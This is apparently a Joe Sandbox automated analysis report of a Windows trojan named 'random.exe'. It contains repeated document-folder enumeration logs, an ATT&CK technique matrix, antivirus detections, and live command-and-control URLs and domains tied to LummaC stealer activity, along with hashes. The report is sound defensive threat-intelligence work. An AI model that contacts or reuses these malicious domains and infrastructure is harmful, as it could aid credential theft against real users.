        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\random.exeDirectory queried: number of queries: 1001

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation
        1
        DLL Side-Loading
        211
        Process Injection
        23
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        1
        Query Registry
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        1
        Disable or Modify Tools
        LSASS Memory231
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)211
        Process Injection
        Security Account Manager23
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares31
        Data from Local System
        113
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
        Deobfuscate/Decode Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model2
        Clipboard Data
        Protocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
        Obfuscated Files or Information
        LSA Secrets2
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing
        Cached Domain Credentials22
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        random.exe66%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
        random.exe76%VirustotalBrowse
        random.exe100%AviraTR/ATRAPS.Gen
        random.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://pancakedipyps.click:443/apidfmbI100%Avira URL Cloudmalware
        https://pancakedipyps.click:443/api)100%Avira URL Cloudmalware
        https://pancakedipyps.click/apiPP100%Avira URL Cloudmalware
        https://pancakedipyps.click:443/apik100%Avira URL Cloudmalware
        https://pancakedipyps.click/apiUT100%Avira URL Cloudmalware
        https://pancakedipyps.click/Z100%Avira URL Cloudmalware
        https://pancakedipyps.click/la100%Avira URL Cloudmalware
        https://pancakedipyps.click/bu100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        pancakedipyps.click
        188.114.97.3
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          pancakedipyps.clickfalse
            high
            cloudewahsj.shopfalse
              high
              noisycuttej.shopfalse
                high
                nearycrepso.shopfalse
                  high
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      framekgirus.shopfalse
                        high
                        https://pancakedipyps.click/apifalse
                          high
                          tirepublicerj.shopfalse
                            high
                            abruptyopsn.shopfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://pancakedipyps.click:443/apidfmbIrandom.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://pancakedipyps.click/apiPPrandom.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://upx.sf.netAmcache.hve.6.drfalse
                                high
                                https://pancakedipyps.click:443/apikrandom.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pancakedipyps.click:443/api)random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pancakedipyps.click/apiUTrandom.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pancakedipyps.click/larandom.exe, 00000003.00000002.1797182496.0000000000BD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pancakedipyps.click/Zrandom.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pancakedipyps.click/burandom.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pancakedipyps.click/random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://pancakedipyps.click/pirandom.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://pancakedipyps.click:443/apirandom.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      188.114.97.3
                                      pancakedipyps.clickEuropean Union
                                      13335CLOUDFLARENETUSfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1585859
                                      Start date and time:2025-01-08 11:46:07 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 4m 41s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:random.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@7/5@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 98%
                                      • Number of executed functions: 37
                                      • Number of non-executed functions: 106
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21, 20.190.159.23, 20.109.210.53, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      TimeTypeDescription
                                      05:46:56API Interceptor7x Sleep call for process: random.exe modified
                                      05:47:08API Interceptor1x Sleep call for process: WerFault.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      188.114.97.3GTA5-elamigos.exeGet hashmaliciousEsquele StealerBrowse
                                      • /api/get/dll
                                      DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                      • www.uzshou.world/ricr/
                                      Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                      • www.cifasnc.info/8rr3/
                                      Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                      Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                      • www.cifasnc.info/8rr3/
                                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                      • /api/get/free
                                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                      • /api/get/free
                                      RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                      • www.rgenerousrs.store/o362/
                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                      • www.beylikduzu616161.xyz/2nga/
                                      Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                      • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      pancakedipyps.clickebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                      • 188.114.97.3
                                      vVJvxAfBDM.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 104.21.23.76
                                      0Pm0sadcCP.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 172.67.209.202
                                      J18uCKmoAw.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.209.202
                                      fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                      • 172.67.209.202
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 172.67.209.202
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                      • 172.67.209.202
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                      • 104.21.23.76
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                      • 104.21.23.76
                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                      • 104.21.23.76
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSQ1 Statements.htmlGet hashmaliciousUnknownBrowse
                                      • 104.18.95.41
                                      174.exeGet hashmaliciousXmrigBrowse
                                      • 104.21.95.99
                                      https://www.dollartip.info/unsubscribe/?d=mdlandrec.netGet hashmaliciousUnknownBrowse
                                      • 172.66.0.227
                                      https://wetransfert-devis-factgfd.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                      • 104.21.32.1
                                      mail (4).emlGet hashmaliciousUnknownBrowse
                                      • 104.18.1.150
                                      https://www.dollartip.info/neuroGet hashmaliciousUnknownBrowse
                                      • 104.18.36.7
                                      Subscription_Renewal_Invoice_2025_HKVXTC.htmlGet hashmaliciousHTMLPhisherBrowse
                                      • 104.17.25.14
                                      chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.80.1
                                      xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.80.1
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      a0e9f5d64349fb13191bc781f81f42e1asd.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      GR7ShhQTKE.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      ab89jay39E.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      wRhEMj1swo.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      socolo.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.97.3
                                      Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                      • 188.114.97.3
                                      No context
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):0.8858331213149667
                                      Encrypted:false
                                      SSDEEP:96:YmFfMlh2C28s2gejTOAqyS3QXIDcQlc6VcEdcw31+BHUHZ0ownOgHkEwH3dEFYAZ:/llC28aA0LR3kaGGzuiFcoZ24IO8n
                                      MD5:3384BACA49EE74A6A28F249756F5F343
                                      SHA1:33B5E87CAB428CE0A2EBA9DE211B16B24FEFEDA2
                                      SHA-256:C6841072507B266FBDB0CFD365F9D4738D67ECC71653F2A29D7C78FD185FB9F7
                                      SHA-512:93E3F1D8B44F1AA0FC1EBA4C931E22DE12D5D58C93304370F2FBA330CAF7043328423107EC50D96D214E1A051004633732A6619DD048562149CCAB29E9FC4D35
                                      Malicious:true
                                      Reputation:low
